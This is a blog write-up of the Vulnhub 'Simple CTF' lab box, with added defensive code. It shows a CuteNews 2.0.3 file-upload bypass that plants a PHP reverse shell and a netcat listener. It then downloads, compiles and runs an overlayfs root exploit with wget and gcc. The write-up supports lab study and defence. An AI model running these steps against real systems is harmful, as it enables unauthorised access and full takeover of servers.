Posted in Penetration Testing, web app testing

SecTalks: BNE0x03 Simple CTF

Hosted by: Vulnhub
Created by: @RobertWinkel (Bull)

I had a lot of trouble getting this VM to obtain a DHCP lease. For some reason VirtualBox was broken, so in working through this I also managed to fix VirtualBox too.

After all the shenanigans I was able to get an IP for the Simple CTF box. Great! A quick nmap scan then.

nmap -sS 10.0.2.6 -A

[Screenshot: nmap scan results]

We see that port 80 is open. It’s running Apache on Ubuntu, with the http-title “Please login / CuteNews”. OK, why not?

[Screenshot: CuteNews login page]

Not much to look at here. I created an account with the credentials test:test, logged in to the portal and started looking around. I navigated to the ‘Help/About’ page, where I was met with a pop-up box alerting me to the fact that CuteNews v2.0.3 was out of date and I had to upgrade due to security issues.

[Screenshot: CuteNews out-of-date warning]

This is great news for a trainee pen tester. It actually tells me what I need to do next.
I instantly fire off to Google and search for “CuteNews v2.0.3 exploit”. Lo and behold, a lovely exploit-db link for me to go into (after I clicked on a few others, of course).

CuteNews 2.0.3 – Arbitrary File Upload Vulnerability

I read through every wee detail; it started to sound a lot like a reverse PHP shell situation. I was very excited indeed.

Carving the exploit

The details of the exploit reveal that an account must be created, an evil.jpg uploaded as the avatar image, and Tamper Data used to change evil.jpg to evil.php in the request. I’ve used Tamper Data before, but I wanted to try Burp Suite for this.

Using the excellent PHP-Reverse-Shell from Pentest Monkey, I edited the file to connect back to my Kali box IP and saved it as Evil.JPG. Didn’t need to call it Evil, but it’s fitting.

After that, I opened Burp Suite and proxied the CuteNews site through it. Details of how to do that can be found all over the net. I set the stage so that I just had to hit ‘Save Changes’ on the CuteNews profile page. Burp caught the request before it was sent to the web server.

[Screenshot: intercepted avatar upload request in Burp]

As you can see, the uploaded file is in the request. Just take out the .jpg part, replace it with .php and hit ‘Forward’ on the menu bar. The Burp Suite part is done for now, so close it all down, as it causes problems later when we get a shell. Trust me.
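The upload worked because the server trusted the client-supplied filename and stored the file under the web root with that extension. The following is an added example (not CuteNews code, and not from the original post) of the server-side check that would have refused it: the extension must be on an allow-list, the file body must start with the matching image signature, and the stored name is chosen by the server. The allow-list and signatures are assumptions for the example.

```python
import os
import secrets

# Allow-list of avatar extensions and the magic bytes each must begin with.
# Assumed set for this example; restrict it to what the application needs.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class RejectedUpload(ValueError):
    """Raised when an avatar upload fails validation."""


def validate_avatar(client_filename, data):
    """Return a server-chosen filename for an accepted avatar, or raise.

    The client name is used only to pick the extension, and only if that
    extension is allow-listed; the body must also carry the matching image
    signature. Renaming evil.jpg to evil.php in a proxy fails the first
    check, and a PHP file named Evil.JPG fails the second.
    """
    ext = os.path.splitext(client_filename)[1].lstrip(".").lower()
    if ext not in ALLOWED:
        raise RejectedUpload("extension not allowed: %r" % ext)
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        raise RejectedUpload("content does not match a %s image" % ext)
    # Cheap heuristic against PHP tags appended to a real image (polyglots);
    # it is not a substitute for keeping the upload directory non-executable.
    if b"<?php" in data or b"<?=" in data:
        raise RejectedUpload("embedded PHP tag in image data")
    # Never derive the stored name from user input (the target built
    # avatar_<user>_<name>): random name, extension fixed by the server.
    return "avatar_%s.%s" % (secrets.token_hex(8), ext)
```

Even with this check in place, the web server should be configured not to execute scripts from the upload directory, so a bypass of the validator cannot turn into code execution.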

Where did the upload go?

At this point we have no way of calling our Evil.php file, so we need to find its URL. This is where DIRB comes in handy. CTRL+ALT+T for a new terminal tab and type in:

dirb http://10.0.2.6

This uses common wordlists to map a website’s directories. It’s a lot quicker than DirBuster. We get some results.

[Screenshot: dirb results]

I initially fired over to the /docs/ folder; however, the file wasn’t there. Funnily enough, it was in the /uploads/ folder.

[Screenshot: uploaded avatar listed in /uploads/]

The web server renamed the file to ‘avatar_test_evil.php’. Not a big deal. Before we open the newly uploaded PHP shell we need to start a listener on our machine to receive the connection from the CuteNews server.

nc -lnvp 1234

Port 1234 was the port defined in the Evil.php shell script we uploaded. Within a few seconds of clicking ‘avatar_test_evil.php’ we have a remote shell on the server.

[Screenshot: reverse shell received in netcat]
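From the defender’s side, the step that actually spawned the shell is visible in the Apache access log as a GET for a .php file inside the avatar upload directory. This is an added example (not from the original post) of a detector over combined-format log lines; the upload directory, the executable extensions and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" format prefix: client, ident, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve static content, and the extensions
# the web server would hand to the PHP interpreter. Assumed for this example.
UPLOAD_DIRS = ("/uploads/",)
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")


def executable_upload_hits(lines):
    """Return (client ip, request path, status) for every request that asks
    the server to execute a script from an upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than crash
        # Compare the path only (query string stripped), case-insensitively,
        # so /uploads/x.PHP?cmd=... is still caught.
        path = urlsplit(m.group("path")).path.lower()
        if any(path.startswith(d) for d in UPLOAD_DIRS) and path.endswith(EXEC_EXT):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits


# Constructed sample: a profile save (the upload), a legitimate avatar being
# served, then the server-renamed avatar_test_evil.php being executed (200).
SAMPLE_LOG = """\
10.0.2.15 - - [12/Mar/2016:20:40:10 +0000] "GET /uploads/avatar_alice.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.2.15 - - [12/Mar/2016:20:41:02 +0000] "POST /index.php HTTP/1.1" 200 2381 "-" "Mozilla/5.0"
10.0.2.15 - - [12/Mar/2016:20:41:30 +0000] "GET /uploads/avatar_test_evil.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in executable_upload_hits(SAMPLE_LOG.splitlines()):
        print("script executed from upload dir:", hit)
```

A 200 for such a request is a strong signal; a 403 or 404 for the same path still shows that the upload was attempted and is worth an alert at lower severity.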

Excellent! I really do love this method. I like to upgrade to a proper bash shell, so I type this at the prompt once I’m in.

python -c 'import pty;pty.spawn("/bin/bash")'

This just spawns a bash shell for us, which makes it easier to see where we are in the directory structure.

Privilege Escalation

We have a shell on the server as www-data, the Apache user, which is limited in functionality and options. No good. We need to gain higher privileges. This test was starting to go along the lines of a previous VM I did, Droopy. I checked the version of Ubuntu.

lsb_release -a

Wow, it was the exact same version of Ubuntu: ‘Ubuntu 14.04.2 LTS, codename: trusty’.
I just went along with it and went into gung-ho mode. I had used an exploit for priv-esc on Droopy, so I thought I’d give it a try again.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) – overlayfs Local Root Shell

Navigating to the /tmp/ directory, I ran this command in the shell on the server:

wget https://exploit-db.com/download/37292

After downloading 37292 I ran the following:

  • mv 37292 37292.c
  • gcc 37292.c -o rootMe
  • chmod +x rootMe
  • ./rootMe

Four commands later and we have a root shell.
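The root shell was possible only because the box was running a kernel in the range named by the exploit title above (3.13.0 up to, but not including, 3.19) without the fix. As an added example, not from the original post, here is a small audit helper that parses `uname -r` output and reports whether a host falls in that range. Ubuntu backports fixes without changing the 3.13.0 base version, so the helper also takes the distro’s fixed ABI number (the `-NN` part of the release string) as an optional parameter; that number is a placeholder to be taken from the vendor advisory, it is not on this page.

```python
import re

# Affected upstream range as given by the exploit title: 3.13.0 <= v < 3.19.
VULN_LOW = (3, 13, 0)
VULN_HIGH = (3, 19, 0)


def kernel_version(uname_r):
    """Numeric part of a `uname -r` string: '3.13.0-32-generic' -> (3, 13, 0)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % uname_r)
    return tuple(int(x or 0) for x in m.groups())


def ubuntu_abi(uname_r):
    """Ubuntu kernel ABI number: '3.13.0-32-generic' -> 32, or None if absent."""
    m = re.match(r"^\d+\.\d+\.\d+-(\d+)-", uname_r)
    return int(m.group(1)) if m else None


def in_overlayfs_range(uname_r):
    """True if the upstream version lies in the affected range."""
    return VULN_LOW <= kernel_version(uname_r) < VULN_HIGH


def needs_overlayfs_patch(uname_r, fixed_abi=None):
    """Report whether a host still needs the overlayfs fix.

    Outside the upstream range the answer is no. Inside it, if the distro's
    fixed ABI number is supplied (placeholder; take it from the vendor
    advisory) the running ABI is compared against it; otherwise the host is
    reported as needing attention, since the version alone cannot prove it
    was patched.
    """
    if not in_overlayfs_range(uname_r):
        return False
    abi = ubuntu_abi(uname_r)
    if fixed_abi is None or abi is None:
        return True
    return abi < fixed_abi


if __name__ == "__main__":
    import subprocess
    release = subprocess.check_output(["uname", "-r"], text=True).strip()
    print(release, "needs patch:", needs_overlayfs_patch(release))
```

Run it with `fixed_abi` set from the advisory for your distribution, or feed it a list of release strings collected from a fleet to find the hosts that still need the kernel update.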

[Screenshot: root shell obtained]

A quick ‘cd /root/’ and then ‘cat flag.txt’ and we had the flag!!

[Screenshot: flag.txt contents]

Excited!!

After the initial VirtualBox trouble I had with this one, I was really quite surprised when I popped root on the box. Apart from going to Exploit-DB for the initial exploit, I did this one all on my own, and that’s a great feeling indeed.

It took me longer to write this post than it took to get Root on the server.

Thanks again to Vulnhub and Robert Winkel for this VM.
